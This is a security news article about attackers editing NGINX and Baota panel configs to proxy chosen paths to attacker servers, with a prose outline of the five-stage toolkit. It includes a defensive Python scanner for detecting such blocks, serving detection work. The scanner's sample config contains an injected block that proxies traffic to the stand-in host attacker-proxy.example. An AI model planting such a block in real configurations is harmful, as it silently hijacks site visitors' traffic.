Researchers have found attackers infiltrating servers that run NGINX and silently redirecting part of their user traffic through attacker-controlled infrastructure. The campaign is notable because it abuses ordinary configuration rather than any flaw in the software, which makes it easy to miss.
NGINX, an open-source platform designed for managing web traffic, plays a crucial role in facilitating connections between users and servers. Its capabilities include web serving, load balancing, caching, and functioning as a reverse proxy, which makes it a fundamental tool for many websites.
Recently, researchers at Datadog Security Labs uncovered a malicious campaign that specifically targets NGINX installations and Baota (BT) hosting management panels. The campaign has focused on sites under country-code top-level domains such as .in, .id, .pe, .bd, and .th, as well as educational and governmental sites under .edu and .gov.
The attackers do not exploit a bug. They edit existing NGINX configuration files, injecting additional ‘location’ blocks that match request paths of the attackers' choosing. Inside each block, a rewrite keeps the original request URI intact, and a ‘proxy_pass’ directive then forwards the request to a domain the attackers control, so the visitor receives whatever the attackers' upstream chooses to serve for that path.
What makes this method insidious is that ‘proxy_pass’ is the standard, documented way NGINX hands requests to a backend: the same directive underpins reverse proxying and load balancing across backend server groups. Nothing in NGINX is broken or crashed; the server is doing exactly what its configuration tells it to do. Controls that look for exploitation of a vulnerability therefore see nothing unusual.
To keep the diverted traffic looking normal to the upstream, the injected blocks pass request headers such as ‘Host,’ ‘X-Real-IP,’ ‘User-Agent,’ and ‘Referer’ through unchanged, so the attackers' infrastructure sees the original hijacked hostname and client details as if it were a legitimate backend.
The configuration injections are carried out by a multi-stage scripted toolkit that unfolds across five stages:
- Stage 1 – zx.sh: The initial controller script downloads and launches the subsequent stages. It includes a fallback that sends raw HTTP requests directly over a TCP connection if curl and wget are unavailable.
- Stage 2 – bt.sh: This stage targets NGINX configuration files managed by the Baota panel. It selects an injection template based on the server_name value, overwrites the configuration in place, and reloads NGINX so that service is not visibly interrupted.
- Stage 3 – 4zdh.sh: This script locates NGINX configuration files in the usual directories (sites-enabled, conf.d, and sites-available). It uses csplit and awk to carve up and rewrite the files without corrupting them, checks for existing injections using hashes and a global mapping file, and validates the result with nginx -t before reloading.
- Stage 4 – zdh.sh: This stage narrows its focus to /etc/nginx/sites-enabled, with particular attention to domains under .in and .id. The process mirrors the previous stage, using the same test-then-reload approach, with a forced kill and restart (pkill) as a fallback.
- Stage 5 – ok.sh: In the final stage, the script walks the modified NGINX configurations to build a map of hijacked domains, the injection template used for each, and the proxy targets. This inventory is then sent to a command-and-control (C2) server at 158.94.210[.]227.
Detecting these attacks is difficult. They exploit no vulnerability in NGINX itself; the malicious instructions live in configuration files that are rarely reviewed once a site is deployed, and the toolkit validates and reloads the configuration so nothing breaks. Because only the attacker-chosen paths are diverted and every other request still reaches its intended destination, site owners and ordinary users see nothing wrong. The interception goes unnoticed unless the configuration directories are monitored for changes or outbound connections from the web server to unknown upstreams are watched.
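The configuration-level indicators described above (an added ‘location’ block with a rewrite, pass-through headers and a ‘proxy_pass’ to an external host) are straightforward to check for mechanically. The following scanner is an added example written for this article, not code from Datadog Security Labs or from the campaign's toolkit. It parses NGINX configuration text, extracts each location block, and reports any block whose ‘proxy_pass’ upstream is not on a site-specific allowlist, together with whether the block also rewrites the path and forwards client headers. The embedded sample configuration, the matched paths and the domain attacker-proxy.example are constructed for illustration; the allowlist is an assumption that each site would fill in with its own legitimate upstreams.

```python
"""Scan NGINX configuration text for location blocks that proxy to hosts
outside a site-specific allowlist. Added example; not Datadog's or the
campaign's code. Sample config, paths and attacker-proxy.example are
constructed for illustration."""
import re
import sys
from pathlib import Path
from urllib.parse import urlsplit

# Upstreams that legitimately appear in proxy_pass on this host (assumed;
# a real deployment fills this in from its own backend inventory).
ALLOWED_UPSTREAMS = {"127.0.0.1", "localhost", "app_backend", "unix:"}

# Constructed sample: a normal vhost plus an injected block shaped like
# the pattern the article describes (rewrite + header pass-through +
# proxy_pass to an attacker-controlled host).
SAMPLE_CONF = """\
server {
    listen 80;
    server_name example.in www.example.in;
    root /var/www/example;

    location / {
        try_files $uri $uri/ /index.php?$query_string;
    }

    location /api/ {
        proxy_pass http://127.0.0.1:8080;
    }

    location ~* ^/(promo|bonus|slot) {
        rewrite ^/(.*)$ /$1 break;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header User-Agent $http_user_agent;
        proxy_set_header Referer $http_referer;
        proxy_pass http://attacker-proxy.example;
    }
}
"""

LOCATION_RE = re.compile(r"\blocation\s+([^{]+?)\s*\{")
PROXY_PASS_RE = re.compile(r"\bproxy_pass\s+([^;]+);")
REWRITE_RE = re.compile(r"\brewrite\b")


def _block_body(text, open_brace):
    """Return the text between the brace at open_brace and its match."""
    depth = 0
    for i in range(open_brace, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[open_brace + 1:i]
    raise ValueError("unbalanced braces in config")


def iter_location_blocks(text):
    """Yield (match_expression, body) for every location block in text."""
    for m in LOCATION_RE.finditer(text):
        yield m.group(1).strip(), _block_body(text, m.end() - 1)


def upstream_host(target):
    """Host part of a proxy_pass target; 'unix:' for socket upstreams."""
    target = target.strip()
    if target.startswith("unix:"):
        return "unix:"
    if "://" not in target:
        target = "http://" + target  # bare upstream group name
    return urlsplit(target).hostname or target


def find_suspicious_locations(text, allowed=ALLOWED_UPSTREAMS):
    """Report location blocks that proxy to a host not on the allowlist."""
    findings = []
    for match_expr, body in iter_location_blocks(text):
        for pp in PROXY_PASS_RE.finditer(body):
            host = upstream_host(pp.group(1))
            if host in allowed:
                continue
            findings.append({
                "location": match_expr,
                "upstream": host,
                "rewrites_path": bool(REWRITE_RE.search(body)),
                "forwards_client_headers": ("X-Real-IP" in body
                                            and "$http_referer" in body),
            })
    return findings


def scan_tree(roots):
    """Run the scanner over every file under the given config directories."""
    results = {}
    for root in roots:
        for path in Path(root).rglob("*"):
            if path.is_file():
                hits = find_suspicious_locations(path.read_text(errors="replace"))
                if hits:
                    results[str(path)] = hits
    return results


if __name__ == "__main__":
    roots = sys.argv[1:] or ["/etc/nginx/conf.d", "/etc/nginx/sites-enabled"]
    for finding in find_suspicious_locations(SAMPLE_CONF):
        print("sample:", finding)
    for path, hits in scan_tree(r for r in roots if Path(r).is_dir()).items():
        for finding in hits:
            print(path, finding)
```

On the sample, only the injected block is reported: it proxies to attacker-proxy.example, rewrites the path and forwards client headers, while the /api/ block proxying to 127.0.0.1 is allowlisted. Run against real directories, the allowlist is the control: anything proxying to a host the site does not recognise deserves a look, and a block that also rewrites the path and echoes Host, X-Real-IP and Referer matches the campaign's pattern closely. Pair this with file-integrity monitoring on the configuration directories so an injection is caught when it lands rather than on the next audit.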
The practical lesson is to treat web-server configuration as monitored state rather than set-and-forget: put file-integrity monitoring on the NGINX configuration directories, alert on unexpected nginx -t runs, reloads or restarts, periodically review every ‘proxy_pass’ target against a known list of backends, and watch for outbound connections from web servers to hosts that are not part of the deployment.